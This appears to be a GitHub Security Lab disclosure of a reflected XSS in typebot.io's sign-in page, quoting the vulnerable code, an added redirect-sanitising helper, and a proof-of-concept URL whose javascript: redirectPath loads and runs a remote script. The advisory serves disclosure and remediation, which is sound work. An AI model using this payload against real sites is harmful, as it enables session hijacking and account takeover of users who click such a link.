Coordinated Disclosure Timeline

Summary

A reflected cross-site scripting (XSS) in the sign-in page of typebot.io may allow an attacker to hijack a user’s account.

Project

typebot.io

Tested Version

v2.23.0

Details

Reflected XSS in SignInForm.tsx (GHSL-2024-040)

The sign-in page reads the redirectPath parameter from the URL and, once the user is authenticated, passes it unvalidated to router.replace(). If a user clicks on a link whose redirectPath value uses the javascript: scheme, the attacker who crafted the link may be able to execute arbitrary JavaScript with the privileges of that user.

export const SignInForm = ({
  defaultEmail,
}: Props & HTMLChakraProps<'form'>) => {
  const { t } = useTranslate()
  const router = useRouter()
  const { status } = useSession()
  const [authLoading, setAuthLoading] = useState(false)
  const [isLoadingProviders, setIsLoadingProviders] = useState(true)

  const [emailValue, setEmailValue] = useState(defaultEmail ?? '')
  const [isMagicLinkSent, setIsMagicLinkSent] = useState(false)

  const { showToast } = useToast()
  const [providers, setProviders] =
    useState<
      Record<LiteralUnion<BuiltInProviderType, string>, ClientSafeProvider>
    >()

  const hasNoAuthProvider =
    !isLoadingProviders && Object.keys(providers ?? {}).length === 0

  useEffect(() => {
    if (status === 'authenticated') {
      // URL taken directly from the query parameter and passed to the router
      router.replace(router.query.redirectPath?.toString() ?? '/typebots')
      return
    }

This vulnerability was found with the help of CodeQL’s Reflected XSS query.
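The fix for this class of bug is to treat redirectPath as untrusted input and allow only same-origin, path-only values before handing it to the router. The following helper is an added example written for this advisory, not code from typebot.io; the function name safeRedirectPath and the fallback '/typebots' are this example's own assumptions. It goes beyond the javascript: case in the report and also rejects protocol-relative, backslash and absolute-URL values, returning the fallback whenever the input is not a plain path on the current origin.

```typescript
// Added example (not typebot.io's code): strict allow-list for a
// post-login redirect target. Only same-origin, path-only values such as
// "/typebots" or "/typebots/abc?x=1#y" pass; everything else falls back.
// The name safeRedirectPath and the fallback are assumptions of this example.

const FALLBACK_PATH = '/typebots'

function safeRedirectPath(raw: unknown, fallback: string = FALLBACK_PATH): string {
  // Next.js router.query values may be string | string[] | undefined.
  const value = Array.isArray(raw) ? raw[0] : raw
  if (typeof value !== 'string' || value.length === 0) return fallback

  // Reject control characters and whitespace: browsers strip some of these
  // when parsing "java\tscript:", so the value must be clean before any check.
  if (/[\u0000-\u001f\u007f\s]/.test(value)) return fallback

  // A same-origin path starts with exactly one "/" and is neither
  // protocol-relative ("//evil.example") nor backslash-based ("/\evil.example").
  if (!value.startsWith('/') || value.startsWith('//') || value.startsWith('/\\')) {
    return fallback
  }
  if (value.includes('\\')) return fallback

  // Resolve against a fixed dummy origin. If the browser would treat the
  // value as anything other than a path on that origin (a scheme such as
  // "javascript:" or "data:", or an absolute http(s) URL), reject it.
  let parsed: URL
  try {
    parsed = new URL(value, 'https://placeholder.invalid')
  } catch (_err) {
    return fallback
  }
  if (parsed.origin !== 'https://placeholder.invalid') return fallback

  // Return the normalised path + query + fragment, never the raw input,
  // so "/a/../b" becomes "/b" and nothing outside the path survives.
  return parsed.pathname + parsed.search + parsed.hash
}

// Constructed inputs for a stand-alone run; the first one mirrors the
// shape of the payload in the advisory (decoded, as the router would see it).
const DEMO_INPUTS: unknown[] = [
  "javascript:var script = document.createElement('script');#//",
  '/typebots/abc?x=1#y',
  '//evil.example/phish',
  'https://evil.example/',
  undefined,
]

for (const input of DEMO_INPUTS) {
  console.log(JSON.stringify(input), '->', safeRedirectPath(input))
}
```

In the vulnerable component the call would become router.replace(safeRedirectPath(router.query.redirectPath)). Normalising through the URL parser and returning the reconstructed path, rather than echoing the original string, is what keeps later encoding tricks from slipping past the prefix checks.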

Impact

This issue may lead to Account Takeover.

Proof of Concept

The following link loads a JavaScript file from localhost and executes it in the context of the current domain. An attacker could use the same payload to load JavaScript from a host they control and execute it in the victim's origin.

https://app.typebot.io/signin?redirectPath=javascript:var%20script%20=%20document.createElement(%27script%27);script.src%20=%20%27http://127.0.0.1:8765/alert.js%27;%20document.head.appendChild(script);#//

CVE

Resources

Credit

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2024-040 in any communication regarding this issue.